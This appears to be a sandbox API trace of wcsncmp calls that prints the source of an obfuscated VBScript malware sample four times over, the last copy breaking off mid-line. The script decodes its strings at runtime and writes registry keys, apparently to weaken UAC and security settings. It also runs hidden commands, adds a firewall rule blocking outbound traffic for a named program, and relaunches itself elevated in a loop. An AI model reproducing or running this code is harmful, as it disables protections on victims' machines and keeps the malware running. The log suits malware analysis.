bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0222.944] wcsncmp (_String1="\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -30 [0222.944] wcsncmp (_String1="\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.945] wcsncmp (_String1="\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -4 [0222.945] wcsncmp (_String1="while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), 